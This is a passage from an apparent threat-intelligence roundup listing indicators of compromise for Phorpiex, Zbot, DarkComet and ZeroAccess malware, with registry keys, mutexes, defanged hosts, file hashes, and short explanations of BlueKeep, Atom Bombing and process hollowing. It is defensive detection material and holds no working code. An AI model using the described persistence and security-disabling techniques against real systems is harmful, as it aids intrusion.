6664ecbb04496f8769bd64664cc927aa5b3da2d8db2c90c74f9115d13611f2ee 690160e08d961b5eb173e8d83489182ff1bc593fbacc1ccef29d34b2c123f852 6f9d90e562dbc99bf48c6da0f62acca06483e4cc237f823fd420972e4cab8acb 84b2e1dadf6434fbd682ad5443c07fd584e9ba90ca78cff4e34453da08f9b1a0 8a8e4c0576135b4d7e53e8d371cbaa3044d04aa7487b5165d3a25c7ceb98ef40 8b3ce83864c0fe181a9dc5fc05db1ed0f5b8fa8afb21bf47e13cb42012f99d37 90343d4a110021355c361ba1187512cd992644f1f563451014c330b6100c31bb 918b82b76908de34fc26f1addda953604c608071d2e960aa7ac024dac36b445a 93c68821eea7086225918c163c8480f2f49f3a6b155a221af7211c795ce6b32e 977cc7fd45f54546066ab08ae04f31876d2347948b2631a011756f2a45f8588e 99aad62bb62905258fd7b9ee63811f16c0cb686dc86b49e5f33e0d465d2ecc0b a169e851112a15be3a17a6059e50cfedccd2928a7a2afde40aa21a13bbb31dd5 a77f072f98bba728809627c5cce0408dffd1e6277a5febf654f11c8e5a63f6c7 a94fb77c70d6d08e50aa251e619f7f6a2bd0983322677a5f0b38ba3cd2c46abb aa2709ee07f4479a85e0d64e8f4f08c87ff747fe658f8e93e30713ab6d46724c `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-dINdaoH_6J8/XcWWSG5Lu4I/AAAAAAAAC5g/xt-_H4TWgJEEUL2OlqKNW8gXOAgvOO60QCLcBGAsYHQ/s1600/1d004310b4da6128d37fbbc500fd2edaaac340ad0c02a6d955bb865b6bbf5a36_amp.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.Phorpiex-7373816-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS\\PARAMETERS\\FIREWALLPOLICY\\STANDARDPROFILE\\AUTHORIZEDAPPLICATIONS\\LIST ` | 13 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Microsoft Windows Service ` | 12 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Microsoft Windows Service ` | 12 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS\\PARAMETERS\\FIREWALLPOLICY\\STANDARDPROFILE\\AUTHORIZEDAPPLICATIONS\\LIST \nValue Name: C:\\Windows\\system32\\rundll32.exe ` | 3 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY ` | 3 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\PIXEDFU ` | 3 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\PIXEDFU \nValue Name: Impersonate ` | 3 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\PIXEDFU \nValue Name: Asynchronous ` | 3 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\PIXEDFU \nValue Name: MaxWait ` | 3 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\PIXEDFU \nValue Name: DllName ` | 3 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\PIXEDFU \nValue Name: Startup ` | 3 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: pixedfu ` | 3 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION \nValue Name: FFC6F26321 ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: BCC6F26321 ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: *BCC6F26321 ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: 00FFC6F26321 ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION \nValue Name: C6F26321 ` | 1 \nMutexes | Occurrences \n---|--- \n`.:-Tldr-:.` | 10 \n`A9MTX7ERFAMKLQ` | 3 \n`A9ZLO3DAFRVH1WAE` | 3 \n`AhY93G7iia` | 3 \n`B81XZCHO7OLPA` | 3 \n`BSKLZ1RVAUON` | 3 \n`F-DAH77-LLP` | 3 \n`FURLENTG3a` | 3 \n`FstCNMutex` | 3 \n`GJLAAZGJI156R` | 3 \n`I-103-139-900557` | 3 \n`I106865886KMTX` | 3 \n`IGBIASAARMOAIZ` | 3 \n`J8OSEXAZLIYSQ8J` | 3 \n`LXCV0IMGIXS0RTA1` | 3 \n`MKS8IUMZ13NOZ` | 3 \n`OLZTR-AFHK11` | 3 \n`OPLXSDF19WRQ` | 3 \n`PLAX7FASCI8AMNA` | 3 \n`RGT70AXCNUUD3` | 3 \n`TEKL1AFHJ3` | 3 \n`TXA19EQZP13A6JTR` | 3 \n`VSHBZL6SWAG0C` | 3 \n`chimvietnong` | 3 \n`drofyunfdou` | 3 \n \n*See JSON for more IOCs\n\nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`92[.]63[.]197[.]106` | 10 \n`66[.]199[.]229[.]251` | 3 \n`216[.]58[.]206[.]81` | 3 \n`141[.]101[.]129[.]46` | 3 \n`141[.]101[.]129[.]45` | 3 \n`172[.]217[.]7[.]174` | 2 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`ofoanefubehauufdu[.]ru` | 11 \n`osgohfoeaugfoauef[.]ru` | 8 \n`dio[.]shojnoc[.]com` | 3 \n`dia[.]shojnoc[.]com` | 2 \n`ieguaoeuafhoauedg[.]ru` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`\\_\\DeviceManager.exe` | 12 \n`\\.lnk` | 12 \n`E:\\.lnk` | 12 \n`E:\\$RECYCLE.BIN` | 12 \n`E:\\_` | 12 \n`E:\\_\\DeviceManager.exe` | 12 \n`%SystemRoot%\\T-580580975794906058` | 12 \n`%APPDATA%\\winsvcmgr.txt` | 12 \n`%SystemRoot%\\T-580580975794906058\\winsvc.exe` | 12 \n`%HOMEPATH%\\Local Settings\\Application Data\\pixedfu.dll` | 3 \n`%LOCALAPPDATA%\\pixedfu.dll` | 3 \n`%TEMP%\\323221246224071.exe` | 2 \n`\\$Recycle.Bin\\_HELP_INSTRUCTION.TXT` | 1 \n`%HOMEPATH%\\AppData\\_HELP_INSTRUCTION.TXT` | 1 \n`%APPDATA%\\_HELP_INSTRUCTION.TXT` | 1 \n`%HOMEPATH%\\Desktop\\_HELP_INSTRUCTION.TXT` | 1 \n`%HOMEPATH%\\Documents\\_HELP_INSTRUCTION.TXT` | 1 \n`%HOMEPATH%\\Downloads\\_HELP_INSTRUCTION.TXT` | 1 \n`%HOMEPATH%\\Favorites\\_HELP_INSTRUCTION.TXT` | 1 \n`%HOMEPATH%\\Links\\_HELP_INSTRUCTION.TXT` | 1 \n`%HOMEPATH%\\Saved Games\\_HELP_INSTRUCTION.TXT` | 1 \n`%HOMEPATH%\\_HELP_INSTRUCTION.TXT` | 1 \n`%PUBLIC%\\Music\\Sample Music\\12EAEF0D255F4C3289F8C16727C42FE6.BACKUP` | 1 \n`%PUBLIC%\\Music\\Sample Music\\20410F1A046679B6EE5BB84B050B5D6A.BACKUP` | 1 \n`%PUBLIC%\\Music\\Sample Music\\CD5F520B00FF264246AA4685031109F6.BACKUP` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 01800a0b77486384e49b910debe10f7cee0b315bcf58fde71697f0dd4ec3540e 2032430a872c8bf354dcd1d6ae0f7aca4d02f5b4f0dcfa43ce3d1f795c8c9c72 43503180b734d83a724db448cd4d94b1b4a3096dabec6b9411af061337af8c35 5cf483ced208bc37ee1e71346a22615c88ee294a8b3b411b5d11e77571e2e4fd 7aa31bf90f13024bbcb547c126115b112b17a130fc8169712351c418f93516ca 86d2c77b7dc01092d3591f95f99a7ba79c06e06e83759b7965d18032102a823a 8e56d2ba3bf9e86c66e0eeafe453a8c36f692b4f22edb9e96fecaaef8e894d51 94179eab10b3a394790f3bfd5cf10c5bcabb16cd534997f6361064ac5e686342 af69f159ac7741ff8c72ea41fe76436512c84f7de6870caa6268ca28ac87aabd c6365099edb25124ad0ac0ffbe5a246d3d27a15c42e5bebb3a6a5994797611ef ca4a36212c31444ed2f0c173c0fb9a2ca43a8cfdf2ba7663b3eea52e150a02f3 cea3556aa39780fa88283ac4b89f75bb9e0070fc870f8c2f2940d74c124999ca d70bed520eccb3afa3ebaac4a1644e1b603e407c386a5a3dfeee864acc8be52d e1ef644770cf7cb312df7b2112a140386e246e6bb8c5fb607707e08bc1ad31ad e96f931910f1f64cadda65519f52c5ccd2311cd9d4aa705815b28a21559a4f18 f00fe52b605c93783f69f8ff95605484c73600a0c4ef33336b565e3adfd7bf8b f22b9841d6cfca96f89543e43f6dce478dbed764c3083b7a2dce8ba42e8a2b34 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-1rixAc0aBNI/XcWWiOeLsAI/AAAAAAAAC5o/KflN-Y8gTYM1-_vl2Ca0dz28748UIQfcwCLcBGAsYHQ/s1600/5cf483ced208bc37ee1e71346a22615c88ee294a8b3b411b5d11e77571e2e4fd_amp.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.Zbot-7373691-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS \nValue Name: LoadAppInit_DLLs ` | 48 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS \nValue Name: AppInit_DLLs ` | 48 \nFiles and or directories created | Occurrences \n---|--- \n`%System32%\\Tasks\\aybbmte` | 48 \n`%ProgramData%\\Mozilla\\thfirxd.exe` | 48 \n`%ProgramData%\\Mozilla\\lygbwac.dll` | 48 \n`%HOMEPATH%\\APPLIC~1\\Mozilla\\kvlcuie.dll` | 42 \n`%HOMEPATH%\\APPLIC~1\\Mozilla\\tfbkpde.exe` | 42 \n`%SystemRoot%\\Tasks\\kylaxsk.job` | 42 \n \n#### File Hashes\n\n` 0008d767954ff4cd48317862040f44a8550279d2f80730db9d8c9a6c3e6f69f7 01b1b04fd8af635ddc5953b9c3bd87d510c38476477f201fa59b6ac1ebc89265 02e089e46e5d3a515394aec09a6f8a37cb8be989730bc9a7c29660bfe8f2e1aa 0878a61c44c6f24ea9b7455e663c9ae1f059f5581067957564af8cc90d7bead1 08c3aed6e3b36b219a22d80947cb02a1da27cdd955dcab8938f366c938641d99 0a586547643e008b351990181c6434a4ad1b1d91e2d8cfd2dcc654459e415652 0be41d1d76850b8b1bd55121ecb12c43b20493e7ef00a83d366092998b126a66 1142bde6260aacc7770f40931f1b10a3d72e479e482536590df5c8af3fe7cdb2 11f76ef08d086a6e3f87466f8a77c7bc63dd754dbd5aaf27deaf4e78abe46c4e 12ccd85f6d507d2b558259c0e987c1c0d104dddd62af38b6597c21055bb35f7e 13235beb6e3d194b599cc7cb1eb82ced9cad5ee17ddac09ae13942aed2b4ff14 143471cc5a4f7299a4009841fb1b92ec52bec2f78b426281d0bacc02946855b7 171fdd6c8d3e43050ab23eb0327fd74094ec7d813c5fb4f2f5668a6650e5088a 1be73946fc11127b9587440b45b8ba9452273c1b47698060562f5d6b0c914514 1ed93147bbaf222006509898c620b1cb65866d1f57d12c7f69a0db49cb459730 20a5e8c87d9d5f9c4f212c8324e1c51941c2c92e4193bb460454451c43763c65 23a1c96747d375ef9098389078a48ffe53305fce872ae8d056697aa1f4aee4bf 23f6e421ea4cdb20ba4d0f1b94100847dd67537fa438d0b0579579bca2aa9e64 249534c79cd24e2d4f756ee051f5fa3da34a85ac4d60b24afc19d0d01b03f446 24cfdb52074fedadb316ec85968e36576f44660b618edc8582c4a9d1134a4344 25bac99d7d11cb4a6da8d9a1742da2e31bc59751ed7d557677a11c5ec251a149 285c4a1f783602c538395337b0724f384806f308be12fef1654f77f667762412 29286b6965a37a18bb510f2ceff996456133395c0af62e2d87e58c86877b7a5b 296d4d39691aa73e5392b57a1dff3cf34f7f1e3548ab38d22e7c1bcceb30fc11 2bf03d005dc768b24c4a27218e41c5781902edd872f934d24c02958fd172fbc0 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-y_89MF6JiSQ/XcWWvf1lbjI/AAAAAAAAC5w/TfLgCfHaaFQfsmUfsqmuItv9tqAFPZeDQCLcBGAsYHQ/s1600/4b93b20f209a34073d128875fb8bafcb482331a2f39f3eda3af78d4850d630a9_amp.png>)\n\n \n\n\n* * *\n\n### Win.Malware.DarkComet-7371375-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\DC3_FEXEC ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS\\PARAMETERS\\FIREWALLPOLICY\\STANDARDPROFILE \nValue Name: EnableFirewall ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM \nValue Name: DisableTaskMgr ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS\\PARAMETERS\\FIREWALLPOLICY\\STANDARDPROFILE \nValue Name: DisableNotifications ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM \nValue Name: EnableLUA ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: AntiVirusDisableNotify ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: UpdatesDisableNotify ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WSCSVC \nValue Name: Start ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\CURRENTVERSION\\EXPLORERN \nValue Name: NoControlPanel ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM \nValue Name: DisableRegistryTools ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\CURRENTVERSION ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\CURRENTVERSION\\EXPLORERN ` | 1 \nMutexes | Occurrences \n---|--- \n`DC_MUTEX-F54S21D` | 10 \n`DC_MUTEX-<random, matching [A-Z0-9]{7}>` | 6 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`88[.]67[.]72[.]218` | 5 \n`189[.]24[.]196[.]171` | 3 \n`187[.]14[.]155[.]193` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\dclogs` | 12 \n`%TEMP%\\tmpcmd.bat` | 1 \n \n#### File Hashes\n\n` 198fd0be4b6734556acf2ac56b3caff28d402ef10c0875180ab02a62d320b9c1 3201cfb883cd1c3b8f13b639a40cd08b3a701df41d6488228b586d7909a6f9c3 384fb4c37f5649edff99a8ce89b65b66a74fffe0e27dc8ad0abc6b949391e7e6 386a72805830c4e97a5970ab2c50e973394d2f0c2d89f1be33219a79ae988ab5 3ca6b7c42876362f7c1b27c86e45f5d95443a385ffa01226ab25cea998176219 42b444b7738492be745183895147d005f825dfa44c4b2cb1e256f6a146e3fa63 54f3ab508247399214721d27e61b5f9be1797cf54e1f80590a6075f1086df697 6283cb17aa670de5710f160fe411ba49cd8d6f12ec96141c787311f03d3dbfa0 7175a539ad4450790dcb7fc70b3a83c8fb85001b2fca89e5bdef6b106175c586 7d82900300161ba47eb3ec68e9ebea0f55986a33affff5bbe43e0dd5fee2d907 a7b843e8ece17f12410ed58e1de94c03126d74192d3732dae6071aefb6b190f2 b18d500a121437df8d1170fdf315b8dbe53d0f69214963a665c484bc47a1d3cd b7cfcc21847f1be733342c7c635d30152e3cbc7ac456d44faeb3d0d61933f02d d4c3d0934d55956d694a8097bcd0b69c4743e681ab1985e689d71827514fdd63 dcfc58bbe29cd4d7634c21ac390cca9c3f12becaf8584ac3d3a90da2cd329585 fbaf7fd94f82e6f9dc6de640564350f00b0901763249e14ad29748a79bc41a43 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-YAjhHX1eebw/XcWW8b_sG4I/AAAAAAAAC54/AhmyiOLTkHYdgwspk5bpXeRm6kK9VWFTACLcBGAsYHQ/s1600/3ca6b7c42876362f7c1b27c86e45f5d95443a385ffa01226ab25cea998176219_amp.png>)\n\n \n\n\n* * *\n\n### Win.Packed.ZeroAccess-7370742-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IPHLPSVC \nValue Name: Start ` | 8 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS \nValue Name: DeleteFlag ` | 8 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MPSSVC \nValue Name: DeleteFlag ` | 8 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WSCSVC \nValue Name: DeleteFlag ` | 8 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\BROWSER \nValue Name: Start ` | 8 \n`<HKCR>\\CLSID\\{FBEB8A05-BEEE-4442-804E-409D6C4515E9}\\INPROCSERVER32 \nValue Name: ThreadingModel ` | 8 \n`<HKCR>\\CLSID\\{FBEB8A05-BEEE-4442-804E-409D6C4515E9}\\INPROCSERVER32 ` | 8 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Windows Defender ` | 8 \n`<HKLM>\\SOFTWARE\\CLASSES\\CLSID\\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\\INPROCSERVER32 ` | 8 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS \nValue Name: Type ` | 8 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS \nValue Name: ErrorControl ` | 8 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IPHLPSVC \nValue Name: Type ` | 8 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IPHLPSVC \nValue Name: ErrorControl ` | 8 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IPHLPSVC \nValue Name: DeleteFlag ` | 8 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WSCSVC \nValue Name: Type ` | 8 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WSCSVC \nValue Name: ErrorControl ` | 8 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MPSSVC \nValue Name: Type ` | 8 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MPSSVC \nValue Name: ErrorControl ` | 8 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000010 \nValue Name: PackedCatalogItem ` | 8 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000009 \nValue Name: PackedCatalogItem ` | 8 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000008 \nValue Name: PackedCatalogItem ` | 8 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000007 \nValue Name: PackedCatalogItem ` | 8 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000006 \nValue Name: PackedCatalogItem ` | 8 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000005 \nValue Name: PackedCatalogItem ` | 8 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000004 \nValue Name: PackedCatalogItem ` | 8 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`180[.]254[.]253[.]254` | 8 \n`166[.]254[.]253[.]254` | 8 \n`135[.]254[.]253[.]254` | 8 \n`117[.]254[.]253[.]254` | 8 \n`119[.]254[.]253[.]254` | 8 \n`134[.]254[.]253[.]254` | 8 \n`206[.]254[.]253[.]254` | 8 \n`222[.]254[.]253[.]254` | 8 \n`182[.]254[.]253[.]254` | 8 \n`190[.]254[.]253[.]254` | 8 \n`184[.]254[.]253[.]254` | 8 \n`197[.]254[.]253[.]254` | 8 \n`66[.]44[.]141[.]253` | 8 \n`183[.]254[.]253[.]254` | 8 \n`158[.]254[.]253[.]254` | 8 \n`204[.]254[.]253[.]254` | 8 \n`230[.]254[.]253[.]254` | 8 \n`71[.]17[.]221[.]85` | 7 \n`217[.]209[.]16[.]149` | 7 \n`84[.]40[.]68[.]14` | 7 \n`75[.]64[.]4[.]243` | 7 \n`24[.]145[.]85[.]120` | 7 \n`83[.]233[.]106[.]6` | 7 \n`24[.]176[.]111[.]7` | 7 \n`24[.]92[.]71[.]93` | 7 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`\\systemroot\\assembly\\GAC_32\\Desktop.ini` | 8 \n`\\systemroot\\assembly\\GAC_64\\Desktop.ini` | 8 \n`%System32%\\LogFiles\\Scm\\e22a8667-f75b-4ba9-ba46-067ed4429de8` | 8 \n`%SystemRoot%\\assembly\\GAC_32\\Desktop.ini` | 8 \n`%SystemRoot%\\assembly\\GAC_64\\Desktop.ini` | 8 \n`\\$Recycle.Bin\\S-1-5-18` | 8 \n`\\$Recycle.Bin\\S-1-5-18\\$0f210b532df043a6b654d5b43088f74f` | 8 \n`\\$Recycle.Bin\\S-1-5-18\\$0f210b532df043a6b654d5b43088f74f\\@` | 8 \n`\\$Recycle.Bin\\S-1-5-18\\$0f210b532df043a6b654d5b43088f74f\\L` | 8 \n`\\$Recycle.Bin\\S-1-5-18\\$0f210b532df043a6b654d5b43088f74f\\U` | 8 \n`\\$Recycle.Bin\\S-1-5-18\\$0f210b532df043a6b654d5b43088f74f\\n` | 8 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$0f210b532df043a6b654d5b43088f74f` | 8 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$0f210b532df043a6b654d5b43088f74f\\@` | 8 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$0f210b532df043a6b654d5b43088f74f\\L` | 8 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$0f210b532df043a6b654d5b43088f74f\\U` | 8 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$0f210b532df043a6b654d5b43088f74f\\n` | 8 \n`%ProgramFiles%\\Windows Defender\\MSASCui.exe:!` | 8 \n`%ProgramFiles%\\Windows Defender\\MpAsDesc.dll:!` | 8 \n`%ProgramFiles%\\Windows Defender\\MpClient.dll:!` | 8 \n`%ProgramFiles%\\Windows Defender\\MpCmdRun.exe:!` | 8 \n`%ProgramFiles%\\Windows Defender\\MpCommu.dll:!` | 8 \n`%ProgramFiles%\\Windows Defender\\MpEvMsg.dll:!` | 8 \n`%ProgramFiles%\\Windows Defender\\MpOAV.dll:!` | 8 \n`%ProgramFiles%\\Windows Defender\\MpRTP.dll:!` | 8 \n`%ProgramFiles%\\Windows Defender\\MpSvc.dll:!` | 8 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 1d2d42263d68f09b1946be33971dcc04706ccc597993007b59806c3a23f1ffac 4f59080cc3450aab4dbfae69f1223e79069e3c315bac2df45ea845a68439bcde 559ecb68cce08a6d1d5b27d96295fc81ddc3df2edf1dbf3d765a9831262402c5 907c8629bcd73adf85f6163bacf17831830f0410f7e9840a146b364fb0bb2945 9117e953fe785d1b5c2f350921bd8ec6e14f1e34c0a26059c66c4abfb98e7a55 a026a103b42e4fd2a1b1b21931983d477e53b94210900f2a464cf71dd4868f27 b05d35fe02909b09b6a2c347f619430495530617f209ddba7b357db26cd154d1 d038daa7418565e12cd449a5c13d9f36eef7c3cf76c7739db4f41df68649837f e8a06267aade079e638ab09d0ca9b2697079be1292c237846f93bf802d9c8746 ec683faba46071aa2c11667714ee9d1abbbc1b4a6d6d024b77fc97e497eb5673 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-4lFJDJcAbnw/XcWXOsNexPI/AAAAAAAAC6E/Rqxlj5HTIx0eNcQRTj_FcSjvhL_0AFG_gCLcBGAsYHQ/s1600/a026a103b42e4fd2a1b1b21931983d477e53b94210900f2a464cf71dd4868f27_amp.png>)\n\n \n\n\n \n\n\n* * *\n\n## Exploit Prevention\n\nCisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities. \nCVE-2019-0708 detected \\- (47418) \n--- \nAn attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP request). Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction. \nAtom Bombing code injection technique detected \\- (522) \nA process created a suspicious Atom, which is indicative of a known process injection technique called Atom Bombing. Atoms are Windows identifiers that associate a string with a 16-bit integer. These Atoms are accessible across processes when placed in the global Atom table. Malware exploits this by placing shell code as a global Atom, then accessing it through an Asynchronous Process Call (APC). A target process runs the APC function, which loads and runs the shellcode. The malware family Dridex is known to use Atom Bombing, but other threats may leverage it as well. \nProcess hollowing detected \\- (244) \nProcess hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead. \nKovter injection detected \\- (196) \nA process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns. \nInstallcore adware detected \\- (99) \nInstall core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware. \nExcessively long PowerShell command detected 